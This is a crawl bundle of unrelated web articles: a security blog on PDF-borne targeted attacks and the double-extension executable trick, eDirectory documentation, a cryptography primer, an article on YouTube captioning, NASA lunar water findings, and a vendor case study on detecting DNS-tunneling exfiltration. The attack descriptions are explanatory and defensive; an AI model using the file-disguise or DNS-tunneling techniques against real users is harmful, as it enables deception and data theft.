Adobe Acrobat/Reader being used to install malware. So we decided to take a look at targeted attacks and see which file types were the most popular during 2008 and if that has changed at all during 2009. In 2008 we identified about 1968 targeted attack files. The most popular file type was DOC, i.e. Microsoft Word representing 34.55%. So far in 2009 we have discovered 663 targeted attack files and the most popular file type is now PDF. Why has it changed? Primarily because there has been more vulnerabilities in Adobe Acrobat/Reader than in the Microsoft Office applications. Like the two vulnerabilities we mentioned a week ago. These are scheduled to be fixed by Adobe on May 12. More info about targeted attacks and how they work can be found in the Lab's YouTube video. Because surely by now they've fixed Windows Explorer. You see, in Windows NT, 2000, XP and Vista, Explorer used to Hide extensions for known file types. And virus writers used this "feature" to make people mistake executables for stuff such as document files. The trick was to rename VIRUS.EXE to VIRUS.TXT.EXE or VIRUS.JPG.EXE, and Windows would hide the .EXE part of the filename. Additionally, virus writers would change the icon inside the executable to look like the icon of a text file or an image, and everybody would be fooled.
<urn:uuid:7b581606-bce4-492b-9a43-c46b3a43ff30>
CC-MAIN-2017-04
https://www.f-secure.com/weblog/archives/archive-052009.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281574.78/warc/CC-MAIN-20170116095121-00112-ip-10-171-10-70.ec2.internal.warc.gz
en
0.939678
4,018
2.65625
3
Moving a partition lets you move a subtree in your directory tree. You can move a partition root object (which is a container object) only if it has no subordinate partitions. Figure 6-3 Before and After a Partition Move When you move a partition, you must follow eDirectory containment rules. For example, you cannot move an Organizational Unit directly under the root of the current tree, because the root’s containment rules allow Locality, Country, or Organization, but not Organizational Unit. When you move a partition, eDirectory changes all references to the partition root object. Although the object’s common name remains unchanged, the complete name of the container (and of all its subordinates) changes. When you move a partition, you should choose the option to create an Alias object in place of the container you’re moving. Doing so allows users to continue to log in to the network and find objects in the original directory location. The Alias object that is created has the same common name as the moved container and references the new complete name of the moved container. IMPORTANT:If you move a partition and do not create an Alias object in place of the moved partition, users who are unaware of the partition’s new location cannot easily find that partition’s objects in the directory tree, because they look for them in their original directory location. This might also cause client workstations to fail at login if the workstation NAME CONTEXT parameter is set to the original location of the container in the directory tree. Because the context of an object changes when you move it, users whose name context references the moved object need to update their NAME CONTEXT parameter so that it references the object’s new name. To automatically update users’ NAME CONTEXT after moving a container object, use the NCUPDATE utility. After moving the partition, if you don’t want the partition to remain a partition, merge it with its parent partition. Make sure your directory tree is synchronizing correctly before you move a partition. If you have any errors in synchronization in either the partition you want to move or the destination partition, do not perform a move partition operation. First, fix the synchronization errors. To move a partition: In NetIQ iManager, click thebutton . Specify the name and context of the partition object you want to move in thefield. Specify the container name and context you want to move the partition to in thefield. If you want to create an Alias in the old location for the partition being moved, select. This allows any operations that are dependent on the old location to continue uninterrupted until you can update those operations to reflect the new location.
<urn:uuid:6ad65c41-d357-4a8e-8426-31c2d93e78ad>
CC-MAIN-2017-04
https://www.netiq.com/documentation/edir88/edir88/data/fbgcadca.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281574.78/warc/CC-MAIN-20170116095121-00112-ip-10-171-10-70.ec2.internal.warc.gz
en
0.833146
568
2.671875
3
|RIM Crypto API: Overview of Cryptography| In the scope of electronic data transmission, cryptography is used to provide secure, authenticated communication between a sender and a receiver. It encompasses a wide variety of processes from complex protocols and algorithms to the simple scrambling of letters of text. While cryptography is central to the security and integrity of transmitted data, it is important to realize that no protocol is entirely secure. Protocols and algorithms are constantly being assaulted by increasing intelligent criminals with increasingly more powerful computers. Cryptographers are constantly improving routines and algorithms by increasing key sizes and therefore exponentially increasing the amount of work required by the hacker. The three main goals of cryptography are: The most common use of Cryptography in the business environment is for data encryption. Encryption is the disguising of a message in such a way that its true meaning is shielded until it is deciphered by the intended receiver. There are many different ways to accomplish this. The most common approach is through the use of ciphers. In a typical scenario, a message is encoded using a predetermined and agreed upon protocol and cipher. The resulting message, called the ciphertext, is then transmitted to the receiver. Once the message is delivered, the receiver decrypts the message using the agreed upon protocol. Many different encryption protocols exist. Some are more secure and more practical than others. Effective protocols provide strong security and ensure complete confidentiality of sensitive user information. Your data is only as secure as the encryption protocol used to encrypt it. Once the protocol has been compromised, an intermediary is free to steal, read, delete, or modify your data. Worse yet, an intermediary user could intrecept the messages and pretend to be the user. Bank accounts could be emptied, credit cards could be used and serious crimes could be committed without the user’s knowledge. For obvious reasons, the ramifications of this are disastrous. It is for this reason that ensuring the integrity of your data is just as important as securing it. Data integrity is acheived in modern cryptography by using a hash function to produce a unique “digital fingerprint” of a document. In other words, a complex function is applied to a document to create a unique value. When the message is delivered, the user applies the same hash function to the message. If the resulting values match, then the message likely has not been modified. While even the best hash functions are not guaranteed to produce unique values every time, the chances that two different documents will produce the same value is very highly unlikely. Different hashing routines exist for use in different scenarios. A common hashing routine is the Message Authentication Code (MAC). MACs, which are described in greater detail later in this document, combine encryption keys and hashing functions to allow users transmit secure, key-dependent hash values. In the event that both the hash function and the encryption protocol are compromised, an intermediary user can not only read confidential data, but also mascerade as somebody else. To prevent this from happening, a system is needed to provide sender authentication. Modern security protocols use a “digital signature” to electronically sign a document to prove that it originated from a specific user. One common protocol combines a digital signature along with a private key encryption routine to create a type of digital stamp. In order to decrypt the message, the receiver must decrypt the digital stamp using the sender’s private key. Assuming the sender’s private key has not been compromised, this method assures the authenticity of the digital signature. The concept of digital signatures is widely used in the software industry today. Digital certificates are often used by software companies to distribute their applications over the Internet.
<urn:uuid:adec93ca-251f-46ba-9b48-bdb94d8c6df6>
CC-MAIN-2017-04
http://www.blackberry.com/developers/docs/6.0.0api/net/rim/device/api/crypto/doc-files/overview.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280221.47/warc/CC-MAIN-20170116095120-00324-ip-10-171-10-70.ec2.internal.warc.gz
en
0.919893
744
3.46875
3
In the early history of accessibility of the Internet, video and audio were really not an issue, little existed and what did exist was not vital. At that time accessibility concentrated on the needs of people with vision impairments and, to a slightly smaller degree, to those with muscular-skeletal issues. The requirement was for websites to be compatible with assistive technologies such as screen readers, screen magnifiers and various alternatives to keyboard and mouse input. At this stage people with hearing impairments did not have accessibility issues as they could read the text on the screen. This is not the whole story, as British Sign Language (BSL) is the first language for deaf people in Britain and written text is a second language; this means that deaf people would prefer BSL. I discussed the issue of BSL on websites in 'Should websites include sign language'. My major conclusion was that it would not be practical to convert all content into BSL and therefore web site owners would have to decide what content was important enought to convert into BSL. But today, with the increase use of audio—and especially video—the deaf community is finding that increasing amounts of content is inaccessible. What is needed is captioning. The vast majority of video does not include captioning at the moment. Adding captioning has the obvious benefit of making the content availalbe to the deaf and hard of hearing; but, like many other assistive technolgies, it has a variety of other benefits: - It can be used when it is difficult or inappropriate to listen. - The text is crawled by search engines so captioned videos should get more and better hits. - YouTube has a beta function to translate captions into other languages so the videos become accessible to a much larger audience. - The caption could be an actual translation where having a high quality translation can be justified. - The caption could be a video description so enabling users with vision impairments to better follow the action. - Captions can be a learning tool as the viewer can relate the spoken word and the written word. You Tube is the main purveyor of such content and does include the ability to add captions; but most user-created content does not include captions. This is hardly surprising because most creators are not even aware of the issue and, even if they are, may not be motivated to go to the extra effort to create captions. This may be inevitable for privately created content but is not acceptable for content created for inclusion on commercial websites that should be accessible to all. The difficulty is that creating captions for YouTube clips has been hard and costly. Two recent innovations have made it more feasible and are discussed here: YouTube now have a beta test version that transcribes the audio in real time using Google speech recognition. I have tried this on a few audios and at first sight it is amazing how good it is, but unfortunately at second view you become aware of the mistakes it makes. The problems are that it has to work on any voice; some are clearer than others, also it has to work in real time so the level of processing available is limited and, finally, there is no correction facility so the system does not learn. I believe it will be some years yet before this technology can provide an adequate solution. At present it is what I describe as a band-aid facility; if there is no captioning and a person with a hearing impairment wants to know what the clip is about the transcription will give them a good clue. This is similar to me asking for an automatic translation of a web page, which is inaccessible to me because it is in a language I do not understand, reading the translation will give me a good indication if it is of real interest to me but I know there will be errors in the translation, some of which may be serious, so I would not quote from it without having it translated by a person. On the other hand Videocritter is a free tool that enables captioning to be created for YouTube. It was written by Ken Meyering as a college class project but is of a standard that you would expect from a commercial product. The process is very simple: - Log on to VideoCritter. - Connect to the video on YouTube. - You then have controls to listen to a portion of the video and immediately type the caption, then listen to some more and type some more. - There are also functions to review and correct. - When the caption file is complete you upload it to YouTube I have tried it and it is very easy—you just need a little practice to decide when to stop listening and to start typing. There are other similar tools available but I have not had a chance to do an in depth comparison. All of them require you to type the text so I have two requests for extra functionality to reduce the need to type: - If there is a pre-prepared script then it should be possible to upload this and then use the tools to sync it with the video. - The YouTube Beta transcribe function should produce a caption file that could then be edited and corrected using a tool. One final issue that needs to be resolved is that the standard YouTube Player is not fully accessible. Easy YouTube, which provided a much more accessible player, does not support closed captions. It really is time that YouTube recognised the importance of accessibility and provided a comprehensive solution. Given the need to be accessible and the other benefits that accrue from captioning I would strongly urge anyone, and especially commercial organisations, to start using these tools on the videos on their websites. Further, I would encourage users of the websites to complain when captioning is not included.
<urn:uuid:b8655616-3041-4549-9e95-e8653f23a92e>
CC-MAIN-2017-04
https://www.bloorresearch.com/analysis/accessibility-for-the-deaf-especially-you-tube/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560283689.98/warc/CC-MAIN-20170116095123-00442-ip-10-171-10-70.ec2.internal.warc.gz
en
0.959463
1,171
3.5625
4
It now seems plausible that if NASA or another international space agency wanted to, it could build a human or even a spacecraft refueling outpost on the Moon. NASA today released new research obtained from its Lunar CRater Observation and Sensing Satellite (LCROSS) and Lunar Reconnaissance Orbiter which slammed into the Moon last year as part of an experiment to find out what the orb was really made of. The impact of the $80 million LCROSS satellites into the Lunar surface created an ice-filled a debris plume that NASA scientists have been working "28 hour days" to analyze. NASA said the mission found evidence that the lunar soil within craters is rich in useful materials, and the moon is chemically active and has a water cycle. Scientists also confirmed the water was in the form of mostly pure ice crystals in some places. "By understanding the processes and environments that determine where water ice will be, how water was delivered to the moon and its active water cycle, future mission planners might be better able to determine which locations will have easily-accessible water. The existence of mostly pure water ice could mean future human explorers won't have to retrieve the water out of the soil in order to use it for valuable life support resources. In addition, an abundant presence of hydrogen gas, ammonia and methane could be exploited to produce fuel," NASA stated. The diversity and abundance of certain materials called volatiles, which are compounds that freeze and are trapped in the cold lunar craters and vaporize when warmed by the sun included methane, ammonia, hydrogen gas, carbon dioxide and carbon monoxide. The LCROSS instruments also discovered relatively large amounts of light metals such as sodium, mercury and silver. The findings are published in a set of papers in Science including one from Brown University's planetary geologist Peter Schultz that states the assortment of volatiles - the chemical elements weakly attached to regolith grains - gives scientists clues where they came from and how they got to the polar craters, many of which haven't seen sunlight for billions of years and are among the coldest spots in the solar system. Schultz said many of the volatiles originated with the billions of years-long fusillade of comets, asteroids and meteoroids that have pummeled the Moon. He thinks an assortment of elements and compounds, deposited in the regolith all over the Moon, could have been quickly liberated by later small impacts or could have been heated by the sun, supplying them with energy to escape and move around until they reached the poles, where they became trapped beneath shadows of the frigid craters. In a Bloomberg interview, another LCROSS paper author, Anthony Colaprete, a planetary scientist for NASA at the Ames Research Laboratory detailed the potential space exploration importance of the findings: The moon is an ideal stop-over because its gravity is one- sixth of earth's, and about 2 million pounds of fuel are required to get into low earth orbit. Once you get off earth, you've used a certain amount of fuel, and if you want to go somewhere else, you have to bring that fuel, but that makes it even harder to get off earth. If you can find resources on the moon, or anywhere else, we can use them to generate fuel in space, and use that infrastructure to bring humans to other places." Colaprete told the Wall Street Journal about the Moon: "It's really wet," and that he and his NASA colleagues estimate that 5.6% of the total mass of the targeted lunar crater's soil consists of water ice. In other words, 2,200 pounds of moon dirt would yield a dozen gallons of water. While the findings may again spark interest in utilizing the Moon for human purposes, NASA's budget plan no longer includes such missions. The European Space Agency this year said it was moving forward with a plan to land an autonomous spacecraft on the moon by 2017, with the idea a manned vehicle could land there sometime in the future. The space agency said several European space companies have already assessed the various mission options and designs. China this month launched a Moon probe and say it will land a rover on the Moon's surface in the future. LCROSS was made up of two spacecraft. The first, known as the heavy impactor Centaur separated from the main LCROSS satellite and rocketed toward the moon's surface, burrowing at least 90ft into the moon's surface and throwing up an estimated 250 metric tons of lunar dust. Following four minutes behind, the LRO spacecraft flew through the debris plume, collecting and relaying data back to Earth before it too crashed into the lunar surface, burrowing in about 60ft, NASA stated. Follow Michael Cooney on Twitter: nwwlayer8 Layer 8 Extra Check out these other hot stories:
<urn:uuid:efc0e52f-7b41-4588-9453-ab2313f17d1d>
CC-MAIN-2017-04
http://www.networkworld.com/article/2227537/security/nasa--moon-has-chemistry-to-be-human-space-outpost.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280242.65/warc/CC-MAIN-20170116095120-00168-ip-10-171-10-70.ec2.internal.warc.gz
en
0.954803
983
3.9375
4
10 Guiding Principles The architecture for the Hippocratic database concept is to be based on 10 guiding principles: purpose specification, consent, limited collection, limited use, limited disclosure, limited retention, accuracy, openness and compliance. The Hippocratic database and its components would work in the following way, according to IBM officials. First, metadata tables would be defined for each type of information collected. A Privacy Metadata Creator would generate the tables to determine who should have access to what data and how long that data should be stored. A Privacy Constraint Validator would check whether a sites privacy policies match a users preferences, and once this is verified the data would be transmitted from the user to the database.In the final step, a Data Retention Manager would delete any items stored beyond the length of their intended purpose. Audit trails of queries also would be kept to allow for privacy audits and to guard the database from suspicion that it has been misused. While IBM researchers are interested in eventually including the Hippocratic database concept into IBMs DB2 database, they also want to expand interest in the concept. Agrawal hopes the presentation of the concept will lead other vendors and university researchers to embrace and evolve it. "I wanted the database community to become cognizant of the issues," Agrawal said. "I personally think it will help if others participate in it." A Data Accuracy Analyzer would test the accuracy of the data being shared. Once queries are submitted along with their intended purpose, the Attribute Access Control would verify whether the query is accessing only those fields necessary for the querys purpose. Only records that match the queries purpose would be visible thanks to the Record Access Control component. The Query Intrusion Detector then would run compliance tests on the results to detect any queries whose access pattern varies from the normal access pattern.
<urn:uuid:dfab75a0-b583-492b-af8d-d1e5b194ebb8>
CC-MAIN-2017-04
http://www.eweek.com/c/a/Database/IBM-at-Work-on-Hippocratic-Database/1
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281226.52/warc/CC-MAIN-20170116095121-00470-ip-10-171-10-70.ec2.internal.warc.gz
en
0.940149
371
2.765625
3
The rescue of the trapped Chilean miners has finally been achieved. Amid the most important moment in the history of rescue, while many countries made all their efforts to provide devices to deliver rescue, Planet Technology played an important role. When these Chilean miners had been trapped for more than two weeks since Aug. 5, and the rescue team found there is a slim chance of survival underground on Aug. 22, the communication between the rescue team and the trapped miners became the priority. Transworld, partner of Planet in Chile, offered the Planet network camera and media converter to help set up video conferences among the rescue team, the family members and the trapped miners to watch their life and health condition. This moment moved the whole world when the initial images were conveyed by the products. In the dark and humid shaft, the IR camera has to provide clear images in the darkness. Besides, in order to ensure the long-distance and high-quality video conference, a media converter worked with the camera to deliver stable networking. By transmitting immediately interactive video and audio through two-way audio system, all parties were able to communicate. For more than one and a half months, these devices were the medium that conveyed hope, which was vital for the trapped miners to survive.
<urn:uuid:8166322e-dc47-4a1d-a765-5040a026a81c>
CC-MAIN-2017-04
https://www.asmag.com/showpost/10722.aspx
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281226.52/warc/CC-MAIN-20170116095121-00470-ip-10-171-10-70.ec2.internal.warc.gz
en
0.970984
250
2.546875
3
VoIP Speed Test Running the Test Running a VoIP speed test is an effective way to gauge whether your Internet connection is suitable to run a hosted pbx system using VoIP technology. A number of factors must be considered including how many users you will have on a single internet connection and how many of those users will be on the phone at once. The VoIP speed test below considers a wide range of factors that determine your connection's suitability to VoIP; please read the results carefully and feel free to contact an Easy Office Phone representative for more information. While an internet connection may be suitable to handle one or two concurrent telephone calls, it may be unable to handle five or six concurrent calls. Please refer to our Voip Requirements Checklist on how to select a router, calculate the appropriate amount of bandwidth and choose an effective means of implementing quality of service (QOS). If you are The VoIP speed test below will provide you with a number of measures that you can use to evaluate your Internet connection. The test will open in a new window. VoIP Speed Test Back to Top Interpreting the Results Now that you have run the Voip speed test you will need to interpret the results of the test using each of the measures discussed in this article. The following measures are discussed in this article: Back to Top - Bandwidth- Measures how much data your connection can send and receive (expressed as a unit of time). - Jitter- Measures how much variation exists between packets (sent and received). - Packet Loss- Measures how much information (expressed in packets) is lost during transmission. - Quality of Service- Measures how consistent the flow of data (bandwidth) is from your ISP. - Mean Opinion Score- This is a numeric measure of the sound quality at the receiving end of the communication circuit. - Max Pause- This is a measure of the longest pause recorded during the VoIP speed test (break in audio). The first item examined during the VoIP speed test is bandwidth. Bandwidth measures how much data your internet connection can send (upload) and receive (download) over a time period of one second. In most cases your upload bandwidth and download bandwidth will differ considerably. Upload bandwidth is the limiting factor when determining whether you have enough bandwidth to sustain a certain number of concurrent telephone calls using VoIP. As an example, a typical voice call requires 87 Kbps of upload and download bandwidth. Did your VoIP speed test indicate that you might not have enough bandwidth for your desired number of users? Contact us for suggestions and guidance. Back to Top Jitter is one of the most important factors examined during the VoIP speed test. In basic terms, jitter is the difference between when packets are expected to arrive and when they actually arrive. This often has little impact when you are browsing the web or downloading an e-mail, but for a real-time application like voice over IP, it makes a big difference. In the world of VoIP, timing is everything, and when the timing of packets are constantly being received at unexpected times, an unstable voice connection can result. Watch carefully for this during the VoIP speed test. It's similar to trying to predict when there will be traffic problems on the highway: if you can't predict traffic, you can't be expected to be at work on time in the morning. Some voice providers will implement a jitter buffer which tries to calculate what the maximum amount of jitter will be in a voice conversation, and thus delays the voice conversation in order to keep the conversation from breaking up. A high level of jitter will cause severe degradation in call quality. If you saw a high level of jitter after running the VoIP speed test, you should be aware that your connection may have problems that could prevent it from properly running a VoIP service. Back to Top Packet loss refers to how much information is being lost during transmission; it's expressed in the VoIP speed test results as a percentage. For instance, packet loss of 5% means that 5 per cent of all data transmitted is not reaching its destination. Packet loss can be caused by failures in network cables within the office, excessive network congestion, or general problems with network switching equipment. Packet loss can be constant or occur in bursts. However, bursts are more typical of packet loss. A burst of packet loss over a period of a few seconds will result in little or no voice traffic reaching you and thus you may miss much of the conversation. Packet loss can be caused by a variety of sources. If you noticed packet loss in the results of your VoIP speed test, see below for some suggestions on reducing or preventing it. Back to Top - Avoid network transfers which result in saturation of the upstream bandwidth limit of your internet connection, or enable QoS, or (best option) provide a separate connection dedicated to VoIP - Make sure that there are no ethernet duplex mismatches on your network such as between a cable modem and a router - Check network cables between all network devices such as switches, routers, and modems. Replace each one with a new one to make sure this is not causing the problem - Restart all network equipment to make sure that your issue is not related to low network resources Quality of Service Quality of Service (QoS) is a major consideration in VoIP implementations and should not be ignored - when running the VoIP speed test, be sure to examine your QoS score! QoS deals with the issue of how to guarantee that packet traffic related to voice will not be delayed or dropped due to interference from other, lower-priority traffic. Imagine that you are uploading a large file to a remote website and at the same time you are trying to talk on the telephone. Your router does not know which type of traffic is more important and thus it treats both types of traffic as the same. This will likely result in a degradation of voice quality. There are numerous ways to handle QoS properly on a network and design your network with voice traffic in mind. QoS is discussed in the following article: VoIP requirements - Quality of Service. A QoS score of lower than 70 per cent means that there is a problem with your connection that will very likely impact voice quality. It is best to run this test mutliple times, especially at times when you are experiencing a voice problem. Back to Top Mean Opinion Score Rather than judging the quality of a voice connection by subjective terms such as "very bad" or "great," the voice industry has developed a scoring method to quantitatively measure what level of voice conversation you can expect. This is called the Mean Opinion Score or MsS. The MoS gives us an indication of the perceived voice quality of the media after you have received it. MsS is expressed in the VoIP speed test as a number ranging from 1 to 5, where 1 is the worst and 5 is the best. The values do not need to be whole numbers.MoS Ratings Table Back to Top |5||Excellent||Excellent sound quality (virtually perfect)| |4||Good||Good sound quality resulting in a call similar to a long distance phone call.| |3||Fair||Phone conversation has some interruptions requiring parties to repeat what was said| |2||Poor||Each party has issues hearing the other one speak clearly| |1||Terrible||Neither party can communicate effectively| Max Pause is the longest recorded pause in audio during the length of the VoIP speed test. Ideally you want this to be the smallest number possible, as a large number means that there were pauses in the audio conversation. A long delay could be caused by packet loss or network congestion at the source or destination. Back to Top Different Results at Different Times Why might you get different results from a VoIP speed test at different times? Networks are dynamic environments and conditions can change depending on network usage, time of day, and other factors. It is best to run the VoIP speed test a few times at different times of the day, or after you experience a network related problem, to try to determine the source of the issue. For instance, you might experience a voice drop-out when an employee is uploading a large file but not at other times. If you didn't have QoS setup properly this would affect your voice conversation and thus it would only appear on a VoIP speed test if the employee was still uploading the file - once they had finished the upload, the test might indicate perfectly good results. Back to Top
<urn:uuid:9c0ae4fc-3af3-498c-a74f-99d75009a3f6>
CC-MAIN-2017-04
http://ca.jive.com/resources/voip-speed-test
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280280.6/warc/CC-MAIN-20170116095120-00012-ip-10-171-10-70.ec2.internal.warc.gz
en
0.947773
1,766
2.6875
3
Cisco Basics – User Exec Mode In preparation of your CCNA exam, we want to make sure we cover the various concepts that we could see on your Cisco CCNA exam. So to assist you, below we will discuss the CCNA concept of Entering a Cisco Router's User Mode. As you progress through your CCNA exam studies, I am sure with repetition you will find this topic becomes second nature. Let's see what it looks like to be in each one of these modes. Here I have telneted into our lab router and I am in User Exec Mode: The easiest way to keep track of the mode you're in is by looking at the prompt. The “>” means we are in User Exec Mode. From this mode, we are able to get information like the version of IOS, contents of the Flash memory and a few others. Now, let's check out the available commands in this mode. This is done by using the “?” command and hitting enter: Wow, see all those commands available ? And just to think that this is considered a small portion of the total commands available when in Privileged Mode ! Keep in mind that when you're in the console and configuring your router, you can use some short cuts to save you typing full command lines. Some of these are : Tab: By typing the first few letters of a command and then hitting the TAB key, it will automatically complete the rest of the command. Where there is more than one command starting with the same characters, when you hit TAB all those commands will be displayed. In the picture above, if i were to type “lo” and hit TAB, I would get a listing of “lock, login and logout” because all 3 commands start with “lo”. ?: The question mark symbol “?” forces the router to print a list of all available commands. A lot of the commands have various parameters or interfaces which you can combine. In this case, by typing the main command e.g “show” and then putting the “?” you will get a list of the subcommands. This picture shows this clearly: Other shortcut keys are : CTRL-A: Positions the cursor at the beginning of the line. CTRL-E: Positions the cursor at the end of the line. CTRL-D: Deletes a character. CTRL-W: Deletes a whole word. CTRL-B: Moves cursor back by one step. CTRL-F: Moves cursor forward by one step. One of the most used commands in this mode is the “Show” command. This will allow you to gather a lot of information about the router. Here I have executed the “Show version” command, which displays various information about the router: The “Show Interface < interface> ” command shows us information on a particular interface. This includes the IP address, encapsulation type, speed, status of the physical and logical aspect of the interface and various statistics. When issuing the command, you need to replace the < interface> with the actual interface you want to look at. For example, ethernet 0, which indicates the first ethernet interface : Some other generic commands you can use are the show “running-config” and show “startup-config”. These commands show you the configuration of your router. The running-config refers to the running configuration, which is basically the configuration of the router loaded into its memory at that time. Startup-config refers to the configuration file stored in the NVRAM. This, upon bootup of the router, gets loaded into the router's RAM and then becomes the running-config ! So you can see that User Exec Mode is used mostly to view information on the router, rather than configuring anything. Just keep in mind that we are touching the surface here and not getting into any details. This completes the User Exec Mode section. If you like, you can go back and continue to the Privileged Mode section. We hope you found this Cisco certification article helpful. We pride ourselves on not only providing top notch Cisco CCNA exam information, but also providing you with the real world Cisco CCNA skills to advance in your networking career.
<urn:uuid:2c0efe0b-e2d2-4d90-9392-7d0af0b74a9b>
CC-MAIN-2017-04
https://www.certificationkits.com/cisco-router-user-mode/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280280.6/warc/CC-MAIN-20170116095120-00012-ip-10-171-10-70.ec2.internal.warc.gz
en
0.918175
908
2.546875
3
A team of researchers at Georgia Tech Research Institute is investigating whether passwords are now worthless, given the supercomputer-like performance now available to hackers using standard desktop graphics cards. By submitting your personal information, you agree that TechTarget and its partners may contact you regarding relevant content, products and special offers. "We've been using a commonly available graphics processor to test the integrity of typical passwords of the kind in use here at Georgia Tech and many other places," said Richard Boyd, a senior research scientist at the Georgia Tech Research Institute (GTRI). "Right now we can confidently say that a seven-character password is hopelessly inadequate - and as GPU power continues to go up every year, the threat will increase." The researchers have warned that software development kits simplify coding graphics cards to run general purpose applications rather than just graphics, which makes it easy to harness their power for hacking, according to Boyd. This new capability puts power into many hands, he says, and it could threaten the world's ubiquitous password-protection model because it enables a low-cost password-breaking technique that engineers call "brute-forcing." In brute-forcing, attackers can use a fast GPU (or even a group of linked GPUs) combined with the right software program to break down passwords that are excluding them from a computer or a network. The intruders' high-speed technique basically involves trying every possible password until they find the right one. Christian Brindley, Regional Technical Manager EMEA at VeriSign Authentication, said, "Lots of people think that they have a solid password - over 12 characters long, including a combination of letters, numbers and cases to increase their strength. "However, in today's world passwords are simply not enough to protect sensitive information on their own. In fact, VeriSign research of UK online adults showed that 39% of us disagree that 'user name plus password' is a strong enough security measure. "A password is only one layer of security, which criminals have proven they are able to bypass - either through brute force as the Georgia Tech researchers have demonstrated, or, often, simply by guessing.
<urn:uuid:0b2b3151-b2fd-4dfa-b5a9-9b77f1208423>
CC-MAIN-2017-04
http://www.computerweekly.com/news/1280093554/Graphics-card-supercomputers-render-passwords-pointless
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280718.7/warc/CC-MAIN-20170116095120-00498-ip-10-171-10-70.ec2.internal.warc.gz
en
0.942033
439
3.265625
3
New York state is putting a new spin on traffic monitoring cameras by trying to measure the environmental benefits they can bring. By implementing more than 300 traffic cameras throughout the state and displaying live video feed on public Web sites, TV broadcasts and mobile devices, officials hope residents will know where traffic congestion is before getting into their vehicles. Funded by the New York State Energy Research and Development Authority (NYSERDA) and the New York State Department of Transportation, the program aims to curtail vehicle idling times, which creates more emissions than when vehicles are in motion. According to Sal Graven, NYSERDA spokesman, the effort stems from Gov. David Paterson's Renewable Energy Task Force, which promotes energy efficiency and conservation in the state. The yearlong project has already begun and explores ways to reduce carbon dioxide emission and vehicle mileage. "One way that fits in, and also as a part of that, is to look at reducing idling times for vehicles," Graven said. "While bringing this technology might actually, or could potentially, increase your miles because you would be forced to take a less direct, alternate route, the flipside is you're actually reducing energy consumption by maintaining an active flow of traffic." TrafficLand, a company that delivers live traffic video over the Internet and TV, is providing the real-time video along with Google Maps to display camera locations at www.trafficland.com. Web site users can click on a camera to view an area's traffic. Measuring the environmental benefit could prove to be a daunting task because users access the cameras remotely. But Graven said NYSERDA hopes to receive customer comments and will obtain the number of Web site hits from TrafficLand. He also said the transportation department might be taking actions to measure the environmental benefits. The project's results will be available in approximately one year. "If the cars, trucks and buses are able to flow freely and not sit and idle, then that is a plus for the environment because there aren't as much emissions being emitted into the air from idling as there are from extra vehicles in transit," Graven said.
<urn:uuid:21a56e7b-dd0f-43e4-994f-677531dbca7f>
CC-MAIN-2017-04
http://www.govtech.com/technology/New-York-Seeks-Green.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280730.27/warc/CC-MAIN-20170116095120-00342-ip-10-171-10-70.ec2.internal.warc.gz
en
0.962183
433
2.5625
3
A government agency discovered several of its private, internal documents were available unsecured on the public Internet. The agency's security team quickly performed a forensic investigation to determine possible sources of the data leak. They took steps to isolate logical networks and to avoid traversal among production, staging, and corporate traffic. Based on the documents leaked, they zeroed in on the corporate network. Meanwhile, their IPS and IDS tools had not flagged any malicious behavior. The next steps, packet capture or log analysis, would take too much time without a more narrow focus and there was no guarantee that they would be able to find the source using their logs. - Quickly identify the cause of the data leak and avoid time-consuming tasks such as packet capture and log analysis - Prevent future data leaks A government agency discovered several of its internal documents unsecured on the Internet...Meanwhile, their IPS and IDS tools had not flagged any malicious behavior. The next steps, packet capture or log analysis, would take too much time without a more narrow focus. Using the ExtraHop platform and going back six months from the time of the internal publishing of the documents, the security team looked for anomalous behavior from all internal clients. They saw no unusual activity to common shadow storage (such as Dropbox) nor any FTP or SSH traffic to external servers. However, while examining user Internet usage, the security team noticed unusual DNS activity. While the average requests per client machine had been consistent, one machine had spikes of DNS traffic significantly higher than normal. The security team drilled down into that client machine and identified three concerning behaviors: - The machine was making dozens of DNS requests per second. - The DNS traffic exhibited large packet size, many of them 512 bytes, the maximum safe size for UDP packets. - The DNS traffic was disproportionately TXT records instead of typical A records. Given this abnormal DNS behavior, the security team believed that the host had been compromised and that malicious code was using DNS as a tunnel to extract data from the client machine. By combining large packet payloads with high delivery rates, the attacker was able to achieve multiple kilobits per second of throughput with TXT records, which can hold arbitrary data. The security team isolated the device, wiped the system, and was able to recover the user's workspace. They matched the leaked files to those on the client machine and ensured that no new files were leaked because of system compromise. To prevent future attacks, the team set up a dashboard to look for a number of different indicators of suspicious activity. First, several alerts were setup to identify suspicious DNS behavior. These included alerting on the combination of requests but also on DNS requests from regions where they did not conduct business. Next, a combination of three systems were monitored, first, the amount of database transfers was plotted on a chart, the daily quantity of transfers was generally the same and any spike would indicate a potential issue. Second, using an ExtraHop Application Inspection Trigger the team monitored for outgoing SSH connections from any of its key databases (outgoing SSH connections were strictly prohibited). And finally, the team plotted and monitored authentication attempts to expose any brute force or slow-loris type guessing attempts. The security team was able to quickly identify the compromised machine and stop the data exfiltration something they wouldn't have discovered via their log, IPS, or IDS analysis. Because of ExtraHop's autodiscovery of all L2 - L7 communication and it's ability to transform wire data to a well formatted syslog message and stream its dataset to their SIEM, the platform became part of their pervasive security monitoring strategy. They also set up all of their databases containing personally identifiable information (PII) into a device group within ExtraHop and set alerts based on client requests, size of database response, logins, and protocols in use to flag any unusual behavior that would indicate exfiltration. They have also set up deep encryption analysis to ensure that all sensitive data in flight are encrypted with the correct SSL version, key, and cipher strength. Auditing and reporting has become much simpler and factual. ExtraHop's ability to observe all communication and transactions on the wire has added a wholly new perspective, based on continuous observation, to their security monitoring and analytics strategy.
<urn:uuid:aaeaabb2-2fbd-4aa6-ad2a-b46af26ee29d>
CC-MAIN-2017-04
https://www.extrahop.com/solutions/data-exfiltration-detection/
null
